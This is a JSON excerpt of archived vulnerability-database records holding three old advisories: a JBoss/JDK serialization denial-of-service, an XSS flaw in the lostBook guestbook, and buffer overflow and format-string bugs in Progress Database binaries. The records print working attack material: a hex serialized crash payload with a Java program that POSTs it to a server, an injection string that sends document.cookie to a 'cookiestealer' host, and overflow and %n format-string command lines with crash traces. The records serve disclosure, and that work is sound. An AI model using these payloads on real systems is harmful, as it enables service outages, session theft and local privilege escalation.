"NONE"}}, {"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2006-08-29T00:00:00", "published": "2006-08-29T00:00:00", "id": "SECURITYVULNS:VULN:6553", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6553", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "=+=============================================================\r\nRemotely DoSing JBoss 4.0.2 with serialized java objects\r\nImplications of serialisation vulnerabilies in JDK\r\n=+=============================================================\r\nAuthor: Marc Schoenefeld , illegalaccess.org\r\nmarc/at/illegalaccess.org\r\n=+=============================================================\r\nDate: November 4, 2005\r\n=+=============================================================\r\n\r\nAs I had the chance to demonstrate on HackInTheBox 2005\r\nthe JDK 1.4.2 was vulnerable to a font deserialization bug. This can be\r\nused to crash the default installation of every version\r\nof JBoss application on Win32, up to the current 4.0.2 version.\r\nJBoss offers the possibility of invoking JMX methods\r\nwith the URL:\r\n\r\nhttp://host:8080/invoker/JMXInvokerServlet\r\n\r\nI fuzzed several values in the GRAY.pf font file, and\r\ncreated a serialized font object from it. The resulting\r\nfile can be found in [Appendix:1]. Then I wrote a small program\r\n[Appendix:2] that POSTs the object via HTTP to the \r\n/invoker/JMXInvokerServlet.\r\nThe following deserialisation call crashes the underlying JDK [Appendix:3].\r\n\r\nTo reconstruct run\r\n1) a JBoss server in the default installation\r\n2) un-xxd the file iccprofile.ser.xxd to iccprofile.ser\r\n3) Run InvokerUpload.java [Appendix:2] with two arguments, like\r\n\r\njava InvokerUpload 127.0.0.1 iccprofile.ser\r\n\r\nThere are several other vulnerable object types that\r\ncan be triggered that way from remote like several\r\nclasses from rt.jar that expose this bug also in\r\n1.4.2_09 and 1.5.0_05, as shown in [Appendix:4] and\r\n[Appendix:5]. Even worse these bugs crash the JVM\r\non all platforms (WOCE, write once crash everyhere).\r\n\r\nSun is aware of this particular bug since 7/17/05.\r\nIn order to finally support the safe release of a fix\r\nand an official advisory from Sun I rewill not disclose\r\nthe serialized vulnerable version of the affected\r\njava.lang.* classes until the release of a fix.\r\nAfter my bug report Sun announced fixes in 5.0U6,\r\n1.4.2_11 and 1.3.1_17.\r\n\r\nIt shall be noted that there is no vulnerability problem\r\nwith JBoss itself, as this is a flaw in the JDK only.\r\nProblems in the java serialisation API are not new, see\r\nhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-57707-1\r\nJBoss is used only for demonstration purposes to show a\r\ngood product may suffer from vulnerabilities in the layer\r\nbelow. Therefore every architecture that uses the serialisation\r\nAPI is potentially affected.\r\n\r\nSincerely\r\nMarc Schonefeld\r\n\r\n=+=============================================================\r\n[Appendix:1] iccprofile.ser.xxd\r\n0000000: aced 0005 7372 001e 6a61 7661 2e61 7774 ....sr..java.awt\r\n0000010: 2e63 6f6c 6f72 2e49 4343 5f50 726f 6669 .color.ICC_Profi\r\n0000020: 6c65 4772 6179 f064 2ff1 f299 a2a7 0200 leGray.d/.......\r\n0000030: 0078 7200 1a6a 6176 612e 6177 742e 636f .xr..java.awt.co\r\n0000040: 6c6f 722e 4943 435f 5072 6f66 696c 65c9 lor.ICC_Profile.\r\n0000050: 5794 b0cf c9ef 4203 0001 4900 1f69 6363 W.....B...I..icc\r\n0000060: 5072 6f66 696c 6553 6572 6961 6c69 7a65 ProfileSerialize\r\n0000070: 6444 6174 6156 6572 7369 6f6e 7870 0000 dDataVersionxp..\r\n0000080: 0001 7075 7200 025b 42ac f317 f806 0854 ..pur..[B......T\r\n0000090: e002 0000 7870 0000 0000 0000 0278 4b43 ....xp.......xKC\r\n00000a0: 4d53 0200 0000 6d6e 7472 4752 4159 5859 MS....mntrGRAYXY\r\n00000b0: 5a20 005f 0007 001b 0011 001e 000f 6163 Z ._..........ac\r\n00000c0: 7370 5355 4e57 0000 0001 4b4f 4441 4752 spSUNW....KODAGR\r\n00000d0: 4159 0000 0000 0000 0000 0000 0001 0000 AY..............\r\n00000e0: f6d5 0001 0000 0000 d32b 0000 0000 0000 .........+......\r\n00000f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n0000100: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n0000110: 0000 0000 0000 0000 0000 0000 0006 6370 ..............cp\r\n0000120: 7274 0000 00cc 0000 003f 6465 7363 0000 rt.......?desc..\r\n0000130: 010c 0000 0081 646d 6e64 0000 0190 0000 ......dmnd......\r\n0000140: 0060 7774 7074 0000 01f0 0000 0014 6b54 .`wtpt........kT\r\n0000150: 5243 0000 0204 0000 000e 646d 6464 0000 RC........dmdd..\r\n0000160: 0214 0000 0064 7465 7874 0000 0000 434f .....dtext....CO\r\n0000170: 5059 5249 4748 5420 2863 2920 3139 3937 PYRIGHT (c) 1997\r\n0000180: 2045 6173 746d 616e 204b 6f64 616b 2c20 Eastman Kodak,\r\n0000190: 416c 6c20 7269 6768 7473 2072 6573 6572 All rights reser\r\n00001a0: 7665 642e 0000 6465 7363 0000 0000 0000 ved...desc......\r\n00001b0: 0027 4b4f 4441 4b20 4772 6179 7363 616c .'KODAK Grayscal\r\n00001c0: 6520 436f 6e76 6572 7369 6f6e 202d 2047 e Conversion - G\r\n00001d0: 616d 6d61 2031 2e30 0000 0000 0000 0000 amma 1.0........\r\n00001e0: 0000 0000 0000 0000 00d8 b240 0000 0000 ...........@....\r\n00001f0: 00ff ffff ff11 0100 00c4 087e 0000 0000 ...........~....\r\n0000200: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n0000210: 00c4 087e 0000 0000 00c4 087e 000c 0000 ...~.......~....\r\n0000220: 0001 0000 0000 0000 0000 6465 7363 0000 ..........desc..\r\n0000230: 0000 0000 0006 4b4f 4441 4b00 0000 0000 ......KODAK.....\r\n0000240: 0000 0000 0000 0000 0000 0000 d8b2 4000 ..............@.\r\n0000250: 0000 0000 ffff ffff 0809 8a00 e008 8a00 ................\r\n0000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n0000270: 0000 0000 e008 8a00 0000 0000 e008 8a00 ................\r\n0000280: d82c 8a00 d82c 8a00 0000 5859 5a20 0000 .,...,....XYZ ..\r\n0000290: 0000 0000 f6d5 0001 0000 0000 d32b 6375 .............+cu\r\n00002a0: 7276 0000 0000 0000 0001 0100 0000 6465 rv............de\r\n00002b0: 7363 0000 0000 0000 000a 4772 6179 7363 sc........Graysc\r\n00002c0: 616c 6500 0000 0000 0000 0000 0000 0000 ale.............\r\n00002d0: 0000 0000 d8b2 4000 0000 0000 ffff ffff ......@.........\r\n00002e0: 0809 8a00 e008 8a00 0000 0000 0000 0000 ................\r\n00002f0: 0000 0000 0000 0000 0000 0000 e008 8a00 ................\r\n0000300: 0000 0000 e008 8a00 d82c 8a00 d82c 8a00 .........,...,..\r\n0000310: 0000 78 ..x\r\n\r\n=+=============================================================\r\n[Appendix:2]: InvokerUpload.java\r\nimport java.io.BufferedReader;\r\nimport java.io.ByteArrayInputStream;\r\nimport java.io.FileInputStream;\r\nimport java.io.InputStreamReader;\r\nimport java.io.ObjectInputStream;\r\nimport java.io.PrintWriter;\r\nimport java.net.HttpURLConnection;\r\nimport java.net.URL;\r\n\r\n\r\npublic class InvokerUpload {\r\npublic static void main(String[] a) throws Exception {\r\nURL url = new URL ("http://"+a[0]+":8080/invoker/JMXInvokerServlet");\r\nFileInputStream fis = new FileInputStream(a[1]);\r\nbyte[] b = new byte[fis.available()];\r\nfis.read(b);\r\nSystem.out.println(fis.available());\r\nHttpURLConnection con =\r\n(HttpURLConnection)url.openConnection();\r\ncon.setDoOutput(true);\r\ncon.connect();\r\ncon.getOutputStream().write(b);\r\ncon.getOutputStream().close();\r\nBufferedReader br = new BufferedReader(new\r\nInputStreamReader(con.getInputStream()));\r\nString res = br.readLine();\r\nSystem.out.println(res);\r\nByteArrayInputStream bis = new ByteArrayInputStream(b);\r\nObjectInputStream ois = new ObjectInputStream(bis);\r\nObject o = ois.readObject();\r\n}\r\n}\r\n\r\n=+=============================================================\r\n[Appendix:3] Crash of JBoss 4.0.2 with JDK 1.4.2_08 , font object\r\n23:36:11,359 INFO [Server] JBoss (MX MicroKernel) [4.0.2 (build:\r\nCVSTag=JBoss_4_0_2 date=200505022023)] Started in 13s:359ms\r\n\r\nAn unexpected exception has been detected in native code outside the VM.\r\nUnexpected Signal : EXCEPTION_ACCESS_VIOLATION (0xc0000005) occurred at \r\nPC=0x46F8155\r\nFunction=[Unknown.]\r\nLibrary=C:\java\1.4.2\08\jre\bin\cmm.dll\r\n\r\nNOTE: We are unable to locate the function name symbol for the error\r\n just occurred. Please refer to release documentation for possible\r\n reason and solutions.\r\n\r\n\r\nCurrent Java thread:\r\n at sun.awt.color.CMM.cmmLoadProfile(Native Method)\r\n at java.awt.color.ICC_Profile.getInstance(ICC_Profile.java:706)\r\n at java.awt.color.ICC_Profile.readObject(ICC_Profile.java:1912)\r\n[..]\r\n\r\n=+=============================================================\r\n[Appendix:4] Crash of JBoss 4.0.2 with JDK 1.4.2_09 , vulnerable other \r\nrt.jar class\r\n23:27:04,059 INFO [Server] JBoss (MX MicroKernel) [4.0.2 (build:\r\nCVSTag=JBoss_4_0_2 date=200505022023)] Started in 13s:82ms\r\n#\r\n# An unexpected error has been detected by HotSpot Virtual Machine:\r\n#\r\n# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x080599b6, \r\npid=2664,tid=2708\r\n#\r\n# Java VM: Java HotSpot(TM) Client VM (1.4.2_09-b05 mixed mode)\r\n# Problematic frame:\r\n# V [jvm.dll+0x599b6]\r\n#\r\n# An error report file with more information is saved as hs_err_pid2664.log\r\n#\r\n# If you would like to submit a bug report, please visit:\r\n# http://java.sun.com/webapps/bugreport/crash.jsp\r\n#\r\nDrucken Sie eine beliebige Taste . . .\r\nC:\Programme\jboss-4.0.2\bin>\r\n\r\n=+=============================================================\r\n[Appendix:5] Crash of JBoss 4.0.2 with JDK 1.5.0_05 , vulnerable other \r\nrt.jar class\r\n23:50:41,040 INFO [Server] JBoss (MX MicroKernel) [4.0.2 (build:\r\nCVSTag=JBoss_4_0_2 date=200505022023)] Started in 15s:773ms\r\n#\r\n# An unexpected error has been detected by HotSpot Virtual Machine:\r\n#\r\n# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x6d6fcc05, pid=792, \r\ntid=1896\r\n#\r\n# Java VM: Java HotSpot(TM) Client VM (1.5.0_05-b05 mixed mode)\r\n# Problematic frame:\r\n# V [jvm.dll+0x4cc05]\r\n#\r\n# An error report file with more information is saved as hs_err_pid792.log\r\n#\r\n# If you would like to submit a bug report, please visit:\r\n# http://java.sun.com/webapps/bugreport/crash.jsp\r\n#\r\n=+=============================================================\r\n\r\n\r\n\r\n\r\n", "modified": "2005-11-05T00:00:00", "published": "2005-11-05T00:00:00", "id": "SECURITYVULNS:DOC:10129", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10129", "title": "Remotely DoSing JBoss 4.0.2 with serialized java objects", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\nProduct: lostBook\r\nvendor: veryLost (verylost.tk)\r\nAffected Versions: 1.1 and lower\r\nDescription: A simple flat db guestbook\r\nVulnerabilities: XSS\r\nDate: July 29, 2004\r\nVuln Finder: r3d5pik3 (me)\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n1.) About\r\n2.) Javascript Execution\r\n3.) Vendor Notice\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n(o_O)oOoOoOo [ About ] oOoOoOo(O_o)\r\n\r\nOk the only reason i consider this javascript execution instead of XSS. Is simply because you\r\ncant inject html like you can in most XSS vulnrabilities.\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n(o_O)oOoOoOo [ JScript Execution ] oOoOoOo(O_o)\r\n\r\nOn the write entry page of the guest book there are 4 fields: Name, Email, Website, Entry. The\r\nEmail and Website feild go through no filtering, and a malicous hacker could use that to insert\r\njavascript.\r\n\r\nExample:\r\nThe Website data gets parsed like so\r\nif(isset($web) && $web != "" && $web != " ") echo ' <a href="'.$web.'"><img\r\nsrc="'.$path2files.'website.gif" border="0" alt="'.$web.'"></a>';\r\n\r\nAn attacker would go about injecting xss by the following ways.\r\nInputting the following into either email or website field.\r\nr3d5pik3.com" onload="document.location='http://www.cookiestealer.com?cookie='+document.cookie\r\nif onload doesnt work they could simply use onmouseover instead\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)\r\n\r\nA couple seconds ago.\r\n\r\n-r3d5pik3\r\nph33r t3h r3d 1z !!!", "modified": "2004-07-30T00:00:00", "published": "2004-07-30T00:00:00", "id": "SECURITYVULNS:DOC:6553", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6553", "title": "lostBook v1.1 Javascript Execution", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "No description provided", "modified": "2004-07-30T00:00:00", "published": "2004-07-30T00:00:00", "id": "SECURITYVULNS:VULN:3866", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:3866", "title": "CGI bugs", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:05", "bulletinFamily": "software", "description": "strcpy() and p_stcopy() dbut_p_stcopy are BAD!#@@!#$!\r\nyou need to make use of strncpy() or invent p_stncopy \r\n\r\nThis is straight from the unix man pages for strcpy()\r\nNAME\r\n strcpy, strncpy - copy a string\r\n \r\nSYNOPSIS\r\n #include <string.h>\r\n \r\n char *strcpy(char *dest, const char *src);\r\n\r\nBUGS\r\n If the destination string of a strcpy() is not large\r\n enough (that is, if the programmer was stupid/lazy, and\r\n failed to check the size before copying) then anything\r\n might happen. Overflowing fixed length strings is a\r\n favourite cracker technique.\r\n\r\n The strncpy() function is similar, except that not more\r\n than n bytes of src are copied. Thus, if there is no null\r\n byte among the first n bytes of src, the result wil not be\r\n null-terminated.\r\n\r\nMaybe the below listing is a good place to start looking for things to clean up... IN DEPTH. These are serious security issues \r\nI am sure the public would not be happy to know that their database application willingly provides root would be attackers. \r\nI would suggest aggressively stress testing the below applications. \r\n\r\n[root@linux elguapo]# grep stcopy /usr/dlc/bin/*\r\nBinary file /usr/dlc/bin/dbf matches\r\nBinary file /usr/dlc/bin/_dbutil matches\r\nBinary file /usr/dlc/bin/jni_util.dll matches\r\nBinary file /usr/dlc/bin/mkschema matches\r\nBinary file /usr/dlc/bin/_mprosrv matches\r\nBinary file /usr/dlc/bin/_mprshut matches\r\nBinary file /usr/dlc/bin/orarx matches\r\nBinary file /usr/dlc/bin/_orasrv matches\r\nBinary file /usr/dlc/bin/_proapsv matches\r\nBinary file /usr/dlc/bin/_proapsv.old matches\r\nBinary file /usr/dlc/bin/_probrkr matches\r\nBinary file /usr/dlc/bin/_probuild matches\r\nBinary file /usr/dlc/bin/prodb matches\r\nBinary file /usr/dlc/bin/_progres matches\r\nBinary file /usr/dlc/bin/prolib matches\r\nBinary file /usr/dlc/bin/prolog matches\r\nBinary file /usr/dlc/bin/_prooibk matches\r\nBinary file /usr/dlc/bin/_prooidv matches\r\nBinary file /usr/dlc/bin/_proutil matches\r\nBinary file /usr/dlc/bin/_rfutil matches\r\nBinary file /usr/dlc/bin/showcfg matches\r\nBinary file /usr/dlc/bin/sqlcpp matches\r\nBinary file /usr/dlc/bin/_waitfor matches\r\n\r\nThis is pre 91B08.tar.Z patch\r\n[root@linux progress-java]# /usr/dlc/bin/_proapsv -N `perl -e 'print "A" x 27133'`B\r\nSegmentation fault (core dumped)\r\n[root@linux progress-java]# gdb /usr/dlc/bin/_proapsv core\r\nGNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0\r\nCopyright 2001 Free Software Foundation, Inc.\r\nThis GDB was configured as "i386-mandrake-linux"...\r\nCore was generated by `/usr/dlc/bin/_proapsv -N\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.\r\nProgram terminated with signal 11, Segmentation fault.\r\nReading symbols from /lib/libm.so.6...done.\r\nLoaded symbols for /lib/libm.so.6\r\nReading symbols from /lib/libdl.so.2...done.\r\nLoaded symbols for /lib/libdl.so.2\r\nReading symbols from /usr/lib/libg++.so.2.7.2...done.\r\nLoaded symbols for /usr/lib/libg++.so.2.7.2\r\nReading symbols from /usr/lib/libstdc++-libc6.1-1.so.2...done.\r\nLoaded symbols for /usr/lib/libstdc++-libc6.1-1.so.2\r\nReading symbols from /lib/libc.so.6...done.\r\nLoaded symbols for /lib/libc.so.6\r\nReading symbols from /usr/lib/libstdc++.so.2.7.2...done.\r\nLoaded symbols for /usr/lib/libstdc++.so.2.7.2\r\nReading symbols from /lib/ld-linux.so.2...done.\r\nLoaded symbols for /lib/ld-linux.so.2\r\n#0 0x42414141 in ?? ()\r\n(gdb)\r\n\r\n\r\nThis is in current patch level aka... 91B08.tar.Z\r\nNote there was an attempt at stopping the overflow. I only checked a few of these... truncating a sting to 1024 bytes doesn't really do \r\nmuch if the buffer is still 11 bytes... you need to make use of strncpy() or invent p_stncopy \r\n\r\n[root@linux /root]# /usr/dlc/bin/_mprosrv `perl -e 'print "A" x 3000'`\r\n23:07:29 Input command line truncated at 1024 bytes.\r\n23:07:29 SERVER : Startup parameters cannot be longer than 300 characters. (5901)\r\n\r\n[root@linux /root]# /usr/dlc/bin/_mprosrv `perl -e 'print "A" x 300'` -N `perl -e 'print "A" x 300'` -N `perl -e 'print "A" x 300'`\r\n04:53:29 SERVER : ** Your database name is longer than 11 characters. (448)\r\n04:53:29 SERVER : ** Cannot find or open file /root/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, errno = 36. (43)\r\n04:53:29 SERVER : SYSTEM ERROR: Memory violation. (49)\r\n04:53:29 SERVER : ** Save file named core for analysis by Progress Software Corporation. (439)\r\n04:53:29 SERVER : ** The server terminated due to signal 3. (801)\r\n\r\n[root@linux /root]# /usr/dlc/bin/_mprshut `perl -e 'print "A" x 300'`\r\n** Your database name is longer than 11 characters. (448)\r\n** Cannot find or open file \r\n/root/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, \r\nerrno = 36. (43)\r\nSYSTEM ERROR: Illegal instruction. (47)\r\n\r\nNote the difference in errors... \r\n\r\n** Save file named core for analysis by Progress Software Corporation. \r\n(439)\r\nQuit (core dumped)\r\n\r\n[root@linux /root]# /usr/dlc/bin/_mprshut `perl -e 'print "A" x 300'` -N `perl -e 'print "A" x 300'` -N `perl -e 'print "A" x 300'`\r\n** Your database name is longer than 11 characters. (448)\r\n** Cannot find or open file /root/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, errno\r\n= 36. (43)\r\nSYSTEM ERROR: Memory violation. (49)\r\n** Save file named core for analysis by Progress Software Corporation. (439)\r\nQuit (core dumped)\r\n\r\n[root@linux patch]# $DLC/bin/orarx -S `perl -e 'print "A" x 80000'`\r\nInput command line truncated at 1024 bytes.\r\nSYSTEM ERROR: strent request for more than 32K. (893)\r\n** Save file named core for analysis by Progress Software Corporation.\r\n(439)\r\nQuit (core dumped)\r\n\r\n\r\n[root@linux bin]# ./sqlcpp `perl -e 'print "A" x 7000'`\r\nSegmentation fault\r\n\r\n[root@linux bin]# gdb ./sqlcpp\r\nGNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0\r\nThis GDB was configured as "i386-mandrake-linux"...\r\n(gdb) run `perl -e 'print "A" x 7000'`\r\nStarting program: /home/elguapo/patch/bin/./sqlcpp `perl -e 'print "A" x7000'`\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x081effc0 in p_stcopy ()\r\n(gdb) bt\r\n#0 0x081effc0 in p_stcopy ()\r\n#1 0x080aea60 in sqlppgdst ()\r\n#2 0x41414141 in ?? ()\r\nCannot access memory at address 0x41414141 \r\n\r\n[root@linux bin]# ./_probrkr -S `perl -e 'print "A" x 87000'`\r\n03:14:28 Input command line truncated at 1024 bytes.\r\nPROGRESS stack trace as of\r\n \r\nPROGRESS stack trace as of\r\n \r\nPROGRESS stack trace as of\r\n \r\nPROGRESS stack trace as of\r\n \r\nPROGRESS stack trace as of\r\n \r\nPROGRESS stack trace as of\r\n \r\nPROGRESS stack trace as of\r\n \r\nPROGRESS stack trace as of\r\n \r\nPROGRESS stack trace as of\r\n \r\nPROGRESS stack trace as of \r\n... (runs forever)\r\nSegmentation fault\r\n\r\n[root@linux bin]# ./_sqlschema `perl -e 'print "A" x 87000'`\r\nPassword for root to access\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n...:\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:\r\nSegmentation fault (core dumped)\r\n\r\n[root@linux bin]# gdb ./_sqlschema core\r\nGNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0\r\n\r\nThis GDB was configured as "i386-mandrake-linux"...\r\nCore was generated by\r\n`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.\r\nProgram terminated with signal 11, Segmentation fault.\r\nReading symbols from /usr/dlc/lib/libsql.so...done.\r\nLoaded symbols for /usr/dlc/lib/libsql.so\r\nReading symbols from /usr/dlc/lib/libsnw.so...done.\r\nLoaded symbols for /usr/dlc/lib/libsnw.so\r\nReading symbols from /usr/dlc/lib/libgeneric.so...done.\r\nLoaded symbols for /usr/dlc/lib/libgeneric.so\r\nReading symbols from /usr/dlc/lib/libenv.so...done.\r\nLoaded symbols for /usr/dlc/lib/libenv.so\r\nReading symbols from /usr/dlc/lib/liberr.so...done.\r\nLoaded symbols for /usr/dlc/lib/liberr.so\r\nReading symbols from /usr/dlc/lib/libos.so...done.\r\nLoaded symbols for /usr/dlc/lib/libos.so\r\nReading symbols from /usr/dlc/lib/librdsm.so...done.\r\nLoaded symbols for /usr/dlc/lib/librdsm.so\r\nReading symbols from /usr/dlc/lib/libdt.so...done.\r\nLoaded symbols for /usr/dlc/lib/libdt.so\r\nReading symbols from /usr/dlc/lib/libpfe.so...done.\r\nLoaded symbols for /usr/dlc/lib/libpfe.so\r\nReading symbols from /usr/dlc/lib/librss.so...done.\r\nLoaded symbols for /usr/dlc/lib/librss.so\r\nReading symbols from /usr/dlc/lib/libstubs.so...done.\r\nLoaded symbols for /usr/dlc/lib/libstubs.so\r\nReading symbols from /usr/dlc/lib/libmm.so...done.\r\nLoaded symbols for /usr/dlc/lib/libmm.so\r\nReading symbols from /usr/dlc/lib/librocket.so...done.\r\nLoaded symbols for /usr/dlc/lib/librocket.so\r\n---Type <return> to continue, or q <return> to quit---\r\nReading symbols from /usr/dlc/lib/libpronls.so...done.\r\nLoaded symbols for /usr/dlc/lib/libpronls.so\r\nReading symbols from /lib/libpthread.so.0...done.\r\n\r\nwarning: Unable to set global thread event mask: generic error\r\n[New Thread 1024 (LWP 6553)]\r\nError while reading shared library symbols:\r\nCannot enable thread event reporting for Thread 1024 (LWP 6553): generic\r\nerror\r\nReading symbols from /lib/libcrypt.so.1...done.\r\nLoaded symbols for /lib/libcrypt.so.1\r\nReading symbols from /lib/libdl.so.2...done.\r\nLoaded symbols for /lib/libdl.so.2\r\nReading symbols from /lib/libm.so.6...done.\r\nLoaded symbols for /lib/libm.so.6\r\nReading symbols from /lib/libc.so.6...done.\r\nLoaded symbols for /lib/libc.so.6\r\nReading symbols from /usr/dlc/lib/libusort.so...done.\r\nLoaded symbols for /usr/dlc/lib/libusort.so\r\nReading symbols from /lib/ld-linux.so.2...done.\r\nLoaded symbols for /lib/ld-linux.so.2\r\nReading symbols from /lib/libnss_files.so.2...done.\r\nLoaded symbols for /lib/libnss_files.so.2\r\n#0 0x4098c984 in strcpy () from /lib/libc.so.6\r\n(gdb) bt\r\n#0 0x4098c984 in strcpy () from /lib/libc.so.6\r\n#1 0x0807d778 in __DTOR_END__ ()\r\n#2 0x40111284 in tpe_get_cur_userpw () from /usr/dlc/lib/libos.so\r\n#3 0x41414141 in ?? ()\r\nError accessing memory address 0x41414141: No such process.\r\n(gdb)\r\n\r\n\r\n[root@linux bin]# ./_sqldump `perl -e 'print "A" x 87000'` yamom\r\nSegmentation fault (core dumped)\r\n...\r\n\r\n(gdb) bt\r\n#0 0x40937b66 in getenv () from /lib/libc.so.6\r\n#1 0x40985bb3 in _IO_file_close_it () from /lib/libc.so.6\r\n#2 0x4098a1f5 in mallopt () from /lib/libc.so.6\r\n#3 0x4098616d in malloc () from /lib/libc.so.6\r\n#4 0x409c0717 in getpwuid () from /lib/libc.so.6\r\n#5 0x40113b21 in os_getpwname () from /usr/dlc/lib/libos.so\r\n#6 0x40111126 in tpe_get_cur_user () from /usr/dlc/lib/libos.so\r\n#7 0x0804dc41 in dd_getargs ()\r\n#8 0x0804de06 in main ()\r\n#9 0x41414141 in ?? ()\r\nError accessing memory address 0x41414141: No such process.\r\n\r\n\r\n\r\nAnd as a side note there is one more security bug you need to investigate... format strings abuse...\r\nI have yet to find one in a suid program but... one that is called from a suid location is just as bad... \r\njvmStart already has bufferoverflow issues... on top of that its got format strings vulnerabilities. \r\n[root@linux elguapo]# export DLC=/\r\n[root@linux elguapo]# export JREHOME=/\r\n[root@linux elguapo]# /usr/dlc/bin/jvmStart %p,%p,%p,%p,%p\r\ncompleted\r\nError parsing file to execute: (0xbffff070,0x804dd40,0x8055b08,0x804e29c,0x804f480)\r\nError starting JVM, error 22.\r\n\r\nnote the nice memory locations ...\r\n\r\nwe can caue core easily \r\n[root@linux elguapo]# /usr/dlc/bin/jvmStart %s%s%s\r\ncompleted\r\nSegmentation fault (core dumped)\r\n\r\nand write any data we want to the stack with %n\r\n[root@linux elguapo]# /usr/dlc/bin/jvmStart %s%n\r\ncompleted\r\nSegmentation fault (core dumped)\r\n", "modified": "2001-10-06T00:00:00", "published": "2001-10-06T00:00:00", "id": "SECURITYVULNS:DOC:2073", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:2073", "title": "Progress Database vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
